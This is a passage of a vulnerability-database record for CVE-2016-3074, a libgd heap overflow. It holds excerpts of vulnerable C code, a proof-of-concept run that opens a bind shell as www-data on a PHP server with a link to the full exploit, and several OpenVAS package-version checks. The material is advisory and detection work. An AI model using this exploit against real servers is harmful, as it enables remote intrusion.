read:\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 221 static int\r\n| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,\r\n| 223 uLongf * chunkLen, gdIOCtx * in)\r\n| 224 {\r\n| ...\r\n| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {\r\n| 237 return FALSE;\r\n| 238 };\r\n| ...\r\n| 251 }\r\n`----\r\n\r\nlibgd-2.1.1/src/gd_io.c:\r\n,----\r\n| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)\r\n| 212 {\r\n| 213 return (ctx->getBuf)(ctx, buf, size);\r\n| 214 }\r\n`----\r\n\r\n\r\nFor file contexts:\r\n\r\nlibgd-2.1.1/src/gd_io_file.c:\r\n,----\r\n| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)\r\n| 53 {\r\n| ...\r\n| 67 ctx->ctx.getBuf = fileGetbuf;\r\n| ...\r\n| 76 }\r\n| ...\r\n| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)\r\n| 93 {\r\n| 94 fileIOCtx *fctx;\r\n| 95 fctx = (fileIOCtx *)ctx;\r\n| 96\r\n| 97 return (fread(buf, 1, size, fctx->f));\r\n| 98 }\r\n`----\r\n\r\n\r\nAnd for dynamic contexts:\r\n\r\nlibgd-2.1.1/src/gd_io_dp.c:\r\n,----\r\n| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)\r\n| 75 {\r\n| ...\r\n| 95 ctx->ctx.getBuf = dynamicGetbuf;\r\n| ...\r\n| 104 }\r\n| ...\r\n| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)\r\n| 257 {\r\n| ...\r\n| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);\r\n| ...\r\n| 284 }\r\n`----\r\n\r\n\r\nPoC\r\n===\r\n\r\nAgainst Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:\r\n\r\n,----\r\n| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\r\n| [*] this may take a while\r\n| [*] offset 912 of 10000...\r\n| [+] connected to 1.2.3.4:5555\r\n| id\r\n| uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n| \r\n| uname -a\r\n| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\r\n| 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n| \r\n| dpkg -l|grep -E \"php5-(fpm|gd)\"\r\n| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\r\n| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 
...\r\n| \r\n| cat upload.php\r\n| <?php\r\n| imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\r\n| ?>\r\n`----\r\n\r\n\r\nSolution\r\n========\r\n\r\nThis bug has been fixed in git HEAD [4].\r\n\r\nFull Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip\r\n\r\nFootnotes\r\n_________\r\n\r\n[1] [http://libgd.org/]\r\n[2] [https://en.wikipedia.org/wiki/Libgd]\r\n[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]\r\n[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39736/"}], "openvas": [{"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "Hans Jerry Illikainen discovered that\nlibgd2, a library for programmatic graphics creation and manipulation, suffers\nof a signedness vulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. 
A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.", "modified": "2019-03-18T00:00:00", "published": "2016-04-24T00:00:00", "id": "OPENVAS:1361412562310703556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703556", "type": "openvas", "title": "Debian Security Advisory DSA 3556-1 (libgd2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3556.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3556-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703556\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-3074\");\n script_name(\"Debian Security Advisory DSA 3556-1 (libgd2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-24 00:00:00 +0200 (Sun, 24 Apr 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3556.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|7)\");\n script_tag(name:\"affected\", value:\"libgd2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 2.0.36~rc1~dfsg-6.1+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.1.0-5+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.1.1-4.1.\n\nWe recommend that you upgrade your libgd2 packages.\");\n script_tag(name:\"summary\", value:\"Hans Jerry Illikainen discovered that\nlibgd2, a library for programmatic graphics creation and manipulation, 
suffers\nof a signedness vulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libgd-dbg:amd64\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd-dbg:i386\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libgd-dev:amd64\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd-dev:i386\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libgd-tools\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-noxpm-dev\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm-dev\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libgd-tools\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-noxpm:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-noxpm:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n 
report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-noxpm-dev\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm-dev:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm-dev:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "Mageia Linux Local Security Checks mgasa-2016-0152", "modified": "2019-03-14T00:00:00", "published": "2016-05-09T00:00:00", "id": "OPENVAS:1361412562310131297", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131297", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0152", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0152.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131297\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:18:00 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0152\");\n script_tag(name:\"insight\", value:\"Updated libgd packages fix security vulnerability: A signedness vulnerability exists in libgd 2.1.1 and earlier which may result in a heap overflow when processing compressed gd2 data (CVE-2016-3074).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0152.html\");\n script_cve_id(\"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0152\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) 
exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"libgd\", rpm:\"libgd~2.1.1~1.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "Junos OS is prone to a heap overflow vulnerability in libgd which allows\nremote attackers to cause a denial of service or potentially execute arbitrary code.", "modified": "2018-10-26T00:00:00", "published": "2017-08-10T00:00:00", "id": "OPENVAS:1361412562310140289", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140289", "type": "openvas", "title": "Junos libgd Heap Overflow Vulnerabiliy", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_jsa1079.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Junos libgd Heap Overflow Vulnerabiliy\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140289\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-10 11:02:59 +0700 (Thu, 10 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-3074\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Junos libgd Heap Overflow Vulnerabiliy\");\n\n script_category(ACT_GATHER_INFO);\n\n script_family(\"JunOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\");\n\n script_tag(name:\"summary\", value:\"Junos OS is prone to a heap overflow vulnerability in libgd which allows\nremote attackers to cause a denial of service or potentially execute arbitrary code.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"libgd is an open-source image library which is bundled with PHP version 4.3\nand above. 
An integer signedness vulnerability exists in libgd 2.1.1 which may result in a heap overflow when\nprocessing compressed gd2 data.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 12.1X46, 12.3X48, 15.1X49, 14.2, 15.1, 15.1X53, 16.1, 16.2.\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10798\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version =~ \"^12\") {\n if ((revcomp(a: version, b: \"12.1X46-D65\") < 0) &&\n (revcomp(a: version, b: \"12.1X46\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"12.1X46-D65\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.3X48-D40\") < 0) &&\n (revcomp(a: version, b: \"12.3X48\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"12.3X48-D40\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^14\") {\n if ((revcomp(a: version, b: \"14.2R8\") < 0) &&\n (revcomp(a: version, b: \"14.2R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.2R8\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^15\") {\n if ((revcomp(a: version, b: \"15.1F7\") < 0) &&\n (revcomp(a: version, b: \"15.1F\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1F7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1R5\") < 0) &&\n (revcomp(a: version, b: \"15.1R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1R5\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D70\") < 0) &&\n 
(revcomp(a: version, b: \"15.1X49\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X49-D70\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X53-D47\") < 0) &&\n (revcomp(a: version, b: \"15.1X53\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X53-D47\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^16\") {\n if ((revcomp(a: version, b: \"16.1R4\") < 0) &&\n (revcomp(a: version, b: \"16.1R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.1R4\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"16.2R2\") < 0) &&\n (revcomp(a: version, b: \"16.2R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.2R2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-06-08T00:00:00", "id": "OPENVAS:1361412562310808313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808313", "type": "openvas", "title": "Fedora Update for gd FEDORA-2016-7d6cbcadca", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gd FEDORA-2016-7d6cbcadca\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808313\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-08 15:47:30 +0200 (Wed, 08 Jun 2016)\");\n script_cve_id(\"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gd FEDORA-2016-7d6cbcadca\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gd on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-7d6cbcadca\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VLAGPHCHY27SKBHQWKM4YBMQW3ZTOHUY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.1.1~3.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:55:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "Hans Jerry Illikainen discovered that\nlibgd2, a library for programmatic graphics creation and manipulation, suffers\nof a signedness vulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.", "modified": "2017-07-07T00:00:00", "published": "2016-04-24T00:00:00", "id": "OPENVAS:703556", "href": "http://plugins.openvas.org/nasl.php?oid=703556", "type": "openvas", "title": "Debian Security Advisory DSA 3556-1 (libgd2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3556.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3556-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software 
Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703556);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-3074\");\n script_name(\"Debian Security Advisory DSA 3556-1 (libgd2 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-04-24 00:00:00 +0200 (Sun, 24 Apr 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3556.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"libgd2 on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 2.0.36~rc1~dfsg-6.1+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.1.0-5+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed 
in\nversion 2.1.1-4.1.\n\nWe recommend that you upgrade your libgd2 packages.\");\n script_tag(name: \"summary\", value: \"Hans Jerry Illikainen discovered that\nlibgd2, a library for programmatic graphics creation and manipulation, suffers\nof a signedness vulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libgd-dbg:amd64\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd-dbg:i386\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libgd-dev:amd64\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd-dev:i386\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libgd-tools\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-noxpm-dev\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm-dev\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res 
= isdpkgvuln(pkg:\"libgd-tools\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-noxpm:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-noxpm:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-noxpm-dev\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm-dev:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", 